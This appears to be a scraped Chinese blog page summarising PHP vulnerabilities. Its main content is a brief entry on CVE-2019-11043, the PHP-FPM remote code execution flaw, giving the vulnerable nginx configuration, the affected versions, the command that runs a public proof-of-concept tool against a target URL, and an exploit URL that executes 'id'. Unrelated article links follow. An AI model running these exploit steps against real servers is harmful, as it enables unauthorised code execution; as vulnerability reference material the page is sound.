CVE-2016-7411
CVE-2016-7412
CVE-2016-7413
CVE-2016-7414
CVE-2016-7415
CVE-2016-7416
CVE-2016-7417
CVE-2016-7418


CVE-2019-11043




Date:

2019.9.

类型:

远程代码执行

前置条件:


Nginx + fastcgi + php-fpm 


配置文件信息如下:

location ~ [^/]\.php(/|$) {

  ...

  fastcgi_split_path_info ^(.+?\.php)(/.*)$;

  fastcgi_param PATH_INFO       $fastcgi_path_info;

  fastcgi_pass   php:;

  ...

}

影响范围:
version>php 7, php5(EXP暂无)
PHP 7.1版本小于7.1.33;PHP 7.2版本小于7.2.24;PHP 7.3版本小于7.3.11

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"


ExP:
http://ip:8080/index.php?a=id


												


											
应用安全 - 编程语言漏洞 - PHP语言漏洞汇总的更多相关文章
	

    
								
  1. PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本
		
    PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本 phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache.PHP.MyS ...
    
		
    2. 
						
  2. DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞
		
    DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞 1.漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量 ...
    
		
    3. 
						
  3. Go语言语法汇总(转)
		
    Go语言语法汇总 分类: 技术2013-09-16 14:21 3007人阅读 评论(0) 收藏 举报 go语言golang并发语法   目录(?)[+]   最近看了看GoLang,把Go语言的语法 ...
    
		
    4. 
						
  4. Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。
		
    Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说... root@xi4ojin:~# cd ...
    
		
    5. 
						
  5. 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
		
    ==Ph4nt0m Security Team==                        Issue 0x03, Phile #0x05 of 0x07 |=----------------- ...
    
		
    6. 
						
  6. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
		
    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read  ...
    
		
    7. 
						
  7. MySQL 0Day漏洞出现 该漏洞可以拿到本地Root权限
		
    2016年9月12日, legalhackers.com网站发布了编号为CVE-2016-6662的0day漏洞公告 .由于该漏洞可以获得MySQL服务器的Root权限,且影响MySql5.5.5.6 ...
    
		
    8. 
						
  8. ref:PHP反序列化漏洞成因及漏洞挖掘技巧与案例
		
    ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧与案例 一.序列化和反序列化 序列化和反序列化的目的是使得程序间传输对象会更加 ...
    
		
    9. 
						
  9. atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现
		
    atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现 1. 返回值法.and全局ERROR 变量法 1 2. 抛出异常Err.Raise 1 3. 实现try  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 用小程序做一个类似于苹果AssistiveTouch功能
			
    一.首先我先介绍一下,我们要做一个什么样的项目功能 项目功能就是一个音频点击播放,当点击为播放的状态时,一个音频的动图出现,而且是可以跟随着手指的滑动而滑动,而且,在滑动动图的时候,当前下的页面是不可 ...
    
			
    2. 
						
  2. JSP 和Servlet 有有什么关系?
			
    Servlet是一个特殊的Java程序,它运行于服务器的JVM中,能够依靠服务器的支持向浏览器提供显示内容. JSP本质上是Servlet的一种简易形式, JSP会被服务器处理成一个类似于Servle ...
    
			
    3. 
						
  3. day_06 猜年龄游戏,三级菜单 ,求1 - 2 + 3 - 4 + 5...99的所有数的和(课后作业)
			
    1.猜年龄游戏: 要求: 允许用户最多尝试3次 每尝试3次后,如果还没猜对,就问用户是否还想继续玩,如果回答Y或y, 就继续让其猜3次,以此往复,如果回答N或n,就退出程序 如果猜对了,有三次选择奖励 ...
    
			
    4. 
						
  4. DB2常用指令
			
    1. 启动实例(db2inst1): db2start 2. 停止实例(db2inst1): db2stop 3. 列出所有实例(db2inst1) db2ilist 3-1.列出当前实例: db2  ...
    
			
    5. 
						
  5. Comet OJ - Contest #8 E.神奇函数
			
    旧题解:https://blog.csdn.net/gmh77/article/details/99066792#commentBox 之前写的有些奇怪,不能体现这道题的sb所以再推一遍 \(\bec ...
    
			
    6. 
						
  6. vue 项目中 js命名规则
			
    类型 规范 示例 常量 全字符大写,单词用 '_' 分隔 FETCH_USERS.GET_USERS 变量.函数 小写开头驼峰式 camelCase 类.特殊意义的命名空间 大写开头驼峰式 Camel ...
    
			
    7. 
						
  7. python-魔法属性和反射
			
    python魔法属性和反射 #!/usr/bin/python3 # coding:utf-8 # Auther:AlphaPanda # Description:与类相关的魔法属性 # Versio ...
    
			
    8. 
						
  8. 4. ClustrixDB CLX命令详解
			
    Clustrix提供了一个名为clx的实用程序来管理其分布式ClustrixDB数据库. 命令在 /opt/clustrix/bin/ 下面 sudo su - clxm 用户即可使用 clx hel ...
    
			
    9. 
						
  9. react样式
			
    https://www.jianshu.com/p/711c596571d6(copy)
    
			
    10. 
						
  10. [模板][快速排序&归并排序]
			
    不得不说,手写的快排真的好菜.(即使开了随机数...) 快速排序 #include<iostream> #include<cstdio> #include<cstring ...
    
			
    11.